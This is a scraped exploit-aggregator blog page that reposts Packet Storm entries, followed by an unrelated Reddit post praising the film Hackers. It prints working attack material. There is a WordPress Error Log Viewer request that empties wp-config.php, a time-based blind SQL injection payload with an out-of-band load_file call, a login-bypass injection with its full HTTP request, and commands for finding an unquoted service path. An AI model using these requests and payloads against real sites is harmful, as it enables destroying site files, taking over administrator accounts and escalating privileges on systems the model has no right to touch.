Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress Error Log Viewer 1.1.1 Arbitrary File Deletion
https://4.bp.blogspot.com/-ILIpsq3JVDo/WWlvQ8IjxbI/AAAAAAAAINI/veR2GTC9zzcP6cUZEvOZqGdUDt2RtL0uQCLcBGAs/s1600/h32.png
WordPress Error Log Viewer plugin version 1.1.1 suffers from an arbitrary file deletion vulnerability where it can be leveraged to wipe the internal contents of any named file the webserver has permissions to modify.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
WordPress Error Log Viewer 1.1.1 Arbitrary File Deletion
https://4.bp.blogspot.com/-ILIpsq3JVDo/WWlvQ8IjxbI/AAAAAAAAINI/veR2GTC9zzcP6cUZEvOZqGdUDt2RtL0uQCLcBGAs/s1600/h32.png
WordPress Error Log Viewer plugin version 1.1.1 suffers from an arbitrary file deletion vulnerability where it can be leveraged to wipe the internal contents of any named file the webserver has permissions to modify.
MD5 |
bd2b398b1fa771ffccb743e2b4156dd3Download
# Exploit Title: WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)
# Date: 09-11-2021
# Exploit Author: Ceylan Bozogullarindan
# Exploit Website: https://bozogullarindan.com
# Vendor Homepage: https://bestwebsoft.com/
# Software Link: https://bestwebsoft.com/products/wordpress/plugins/error-log-viewer/
# Version: 1.1.1
# Tested on: Linux
# CVE: CVE-2021-24966 (https://wpscan.com/vulnerability/166a4f88-4f0c-4bf4-b624-5e6a02e21fa0)
# Description:
Error Log Viewer is a simple utility plugin that helps to find and view log files with errors right from the WordPress admin dashboard. Get access to all log files from one place. View the latest activity, select logs by date, view a full log file or clear a log file!
I've especially emphasized "clearing a log file" statement because the feature of "clearing a log file" can be used to delete an arbitrary file in a Wordpress web site. The reason of the vulnerability is that, the value of a file path which is going to be deleted is not properly and sufficiently controlled. Name of the parameter leading to the vulnerability is "rrrlgvwr_clear_file_name". It can be manipulated only authenticated users.
An attacker can use this vulnerability; to destroy the web site by deleting wp-config.php file, or to cover the fingerprints by clearing related log files.
# Steps To Reproduce
1. Install and activate the plugin.
2. Click the "Log Monitor" available under Error Log Viewer menu item.
3. Choose a log file to clear.
4. Intercept the request via Burp or any other local proxy tool.
5. Replace the value of the parameter "rrrlgvwr_clear_file_name" with a file path which is going to be cleared, such as /var/www/html/wp-config.php.
6. Check the content of the cleared file. You will see that the file is empty.
# PoC - Supported Materials
---------------------------------------------------------------------------
POST /wp-admin/admin.php?page=rrrlgvwr-monitor.php HTTP/1.1
Host: 127.0.0.1:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 603
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: [admin+]
rrrlgvwr_select_log=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Flearnpress%2Finc%2Fgateways%2Fpaypal%2Fpaypal-ipn%2Fipn_errors.log&rrrlgvwr_lines_count=10&rrrlgvwr_from=&rrrlgvwr_to=&rrrlgvwr_show_content=all&rrrlgvwr_newcontent=%5B05-Feb-2015+07%3A28%3A49+UTC%5D+Invalid+HTTP+request+method.%0D%0A%0D%0A++++++++++++++++++++++++&rrrlgvwr_clear_file=Clear+log+file&rrrlgvwr_clear_file_name=/var/www/html/wp-config.php&rrrlgvwr_nonce_name=1283d54cc5&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Drrrlgvwr-monitor.php
---------------------------------------------------------------------------
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
WordPress Error Log Viewer 1.1.1 Arbitrary File Deletion
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Emerson PAC Machine Edition 9.80 Build 8695 Unquoted Service Path
https://3.bp.blogspot.com/-vLPaJ0bXchM/WWlvcii8AuI/AAAAAAAAIPY/lohzKYQrhRkUA5ocnA3xRTtIEj7YZIM-ACLcBGAs/s1600/h77.png
Emerson PAC Machine Edition version 9.80 Build 8695 suffers from an unquoted service path vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Emerson PAC Machine Edition 9.80 Build 8695 Unquoted Service Path
https://3.bp.blogspot.com/-vLPaJ0bXchM/WWlvcii8AuI/AAAAAAAAIPY/lohzKYQrhRkUA5ocnA3xRTtIEj7YZIM-ACLcBGAs/s1600/h77.png
Emerson PAC Machine Edition version 9.80 Build 8695 suffers from an unquoted service path vulnerability.
MD5 |
5494f7d47945a044c1fe7118166335d3Download
# Exploit Title: Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-13
# Vendor Homepage: https://www.emerson.com/en-us
# Software Link : https://www.opertek.com/descargar-software/?prc=_326
# Tested Version: 9.80 Build 8695
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "TrapiServer" |findstr /i /v """
Trapi File Server TrapiServer C:\Program Files (x86)\Emerson\PAC Machine Edition\Common\Components\NT\trapiserver.exe Auto
# Service info:
C:\>sc qc TrapiServer
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: TrapiServer
TYPE : 120 WIN32_SHARE_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Emerson\PAC Machine Edition\Common\Components\NT\trapiserver.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Trapi File Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Emerson PAC Machine Edition 9.80 Build 8695 Unquoted Service Path
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
ServiceNow Orlando Username Enumeration
___________________________
@hacking_Attack
@Hacking_Video
ServiceNow Orlando Username Enumeration
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
ServiceNow Orlando Username Enumeration
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Medical Store Management System 1.0 SQL Injection
https://1.bp.blogspot.com/-luFAqsulr64/WWlvFAfKXLI/AAAAAAAAILI/M2y6qJlcju8Kpq9V68KpSF2h6FJoaSeWACLcBGAs/s1600/h135.png
Medical Store Management System version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Medical Store Management System 1.0 SQL Injection
https://1.bp.blogspot.com/-luFAqsulr64/WWlvFAfKXLI/AAAAAAAAILI/M2y6qJlcju8Kpq9V68KpSF2h6FJoaSeWACLcBGAs/s1600/h135.png
Medical Store Management System version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
df8f961c3b0d0084e6993f21b9dce139Download
## Title: Medical Store Management System v1.0 remote SQL-Injections
## Author: nu11secur1ty
## Date: 02.16.2022
## Vendor: https://github.com/abhisheks008
## Software: https://github.com/abhisheks008/Medical-Store-Management-System
## CVE-Medical Store Management System v1.0
## Description:
The `cid` parameter fom customer-add.php app on Medical Store
Management System v1.0 appears to be vulnerable to SQL injection
attacks.
The application took 20034 milliseconds to respond to the request,
compared with 36 milliseconds for the original request, indicating
that the injected SQL command caused a time delay.
The malicious actor can take control of the system administrator
accounts of this system!
WARNING: If this is in some external domain, or some subdomain, or
internal, this will be extremely dangerous!
Status: CRITICAL
[+] Payloads:
```mysql
---
Parameter: cid (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cid=987101' AND (SELECT 7784 FROM (SELECT(SLEEP(3)))HbQW)
AND 'yDXs'='yDXs&cfname=Safia&clname=Malik&age=22'+(select
load_file('\\\\ej12det210osu6x32wsqrnyu6lce080wrzfr2kq9.https://github.com/abhisheks008/Medical-Store-Management-System\\tah'))+'&sex=Female&phno=9632587415&emid=safia@gmail.com&update=Update
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/abhisheks008/2022/Medical-Store-Management-System)
## Proof and Exploit:
[href](https://streamable.com/p97tbi)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Medical Store Management System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Simple Student Quarterly Result / Grade System 1.0 SQL Injection
https://4.bp.blogspot.com/-Lnl-ZxRP9Iw/WWlvEVwqA2I/AAAAAAAAIK8/WG2BCM3S_lsUOouuCwhP5sp3j7hYzeO-wCLcBGAs/s1600/h133.png
Simple Student Quarterly Result / Grade System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Simple Student Quarterly Result / Grade System 1.0 SQL Injection
https://4.bp.blogspot.com/-Lnl-ZxRP9Iw/WWlvEVwqA2I/AAAAAAAAIK8/WG2BCM3S_lsUOouuCwhP5sp3j7hYzeO-wCLcBGAs/s1600/h133.png
Simple Student Quarterly Result / Grade System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
MD5 |
a53713cff301f15665df2595c5f0844dDownload
# Exploit Title: Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass
# Date: 11/02/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15169/simple-student-quarterly-resultgrade-system-php-and-mysql-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Linux
# Vulnerable Code
line 57 in file "/sqgs/Actions.php"
@$check= $this->db->query("SELECT count(admin_id) as `count` FROM admin_list where `username` = '{$username}' ".($id > 0 ? " and admin_id != '{$id}' " : ""))->fetch_array()['count'];
Steps To Reproduce:
* - Go to the login page http://localhost/sqgs/login.php
Payload:
username: admin ' or '1'='1'#--
password: \
Proof of Concept :
POST /sqgs/Actions.php?a=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 51
Origin: http://localhost
Connection: close
Referer: http://localhost/sqgs/login.php
Cookie: PHPSESSID=v9a2mv23kc0gcj43kf6jeudk2v
username=admin+'+or+'1'%3D'1'%23--&password=0xsaudi
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Simple Student Quarterly Result / Grade System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
TeamSpeak 3.5.6 Insecure File Permissions
___________________________
@hacking_Attack
@Hacking_Video
TeamSpeak 3.5.6 Insecure File Permissions
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
TeamSpeak 3.5.6 Insecure File Permissions
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Google Play Protect 22.4.25 Detection Bypass
___________________________
@hacking_Attack
@Hacking_Video
Google Play Protect 22.4.25 Detection Bypass
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Google Play Protect 22.4.25 Detection Bypass
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Network Video Recorder NVR304-16EP Cross Site Scripting
___________________________
@hacking_Attack
@Hacking_Video
Network Video Recorder NVR304-16EP Cross Site Scripting
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Network Video Recorder NVR304-16EP Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Multi-Vendor Online Groceries Management System 1.0 SQL Injection
___________________________
@hacking_Attack
@Hacking_Video
Multi-Vendor Online Groceries Management System 1.0 SQL Injection
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Multi-Vendor Online Groceries Management System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
hacking: security in practice
Just saw the movie Hackers (1995) & I love it for how stupid it is
I absolutely love it. Its about as accurate on hacking/cybersecurity as Call of Duty is for war or NCIS is for law enforcement. But its so dumb, stupid, and 90s that I love it. I would go as far to say that this movie has my favorite portrayal of hackers in any visual medium, including Mr. Robot which probably has the most accurate portrayal. I was liking the movie from the first minute but when they portrayed the Lennon glasses wearing SOC Analyst monitoring logs in a lair straight out of a James Bond film, I immediately loved it.
Anyways, I just wanted to share that I love this movie and I wouldn't be ashamed in admitting it if I talked to other pen testers in the industry. If non-pen testers asked what I did, I wouldn't be ashamed in sharing this movie with them.
EDIT: Based on everyone’s recommendations, I will watch Wargames, Sneakers, and Swordfish next
submitted by /u/j1mmyava1on
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Just saw the movie Hackers (1995) & I love it for how stupid it is
I absolutely love it. Its about as accurate on hacking/cybersecurity as Call of Duty is for war or NCIS is for law enforcement. But its so dumb, stupid, and 90s that I love it. I would go as far to say that this movie has my favorite portrayal of hackers in any visual medium, including Mr. Robot which probably has the most accurate portrayal. I was liking the movie from the first minute but when they portrayed the Lennon glasses wearing SOC Analyst monitoring logs in a lair straight out of a James Bond film, I immediately loved it.
Anyways, I just wanted to share that I love this movie and I wouldn't be ashamed in admitting it if I talked to other pen testers in the industry. If non-pen testers asked what I did, I wouldn't be ashamed in sharing this movie with them.
EDIT: Based on everyone’s recommendations, I will watch Wargames, Sneakers, and Swordfish next
submitted by /u/j1mmyava1on
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Just saw the movie Hackers (1995) & I love it for how stupid it is
I absolutely love it. Its about as accurate on hacking/cybersecurity as Call of Duty is for war or NCIS is for law enforcement. But its so dumb,...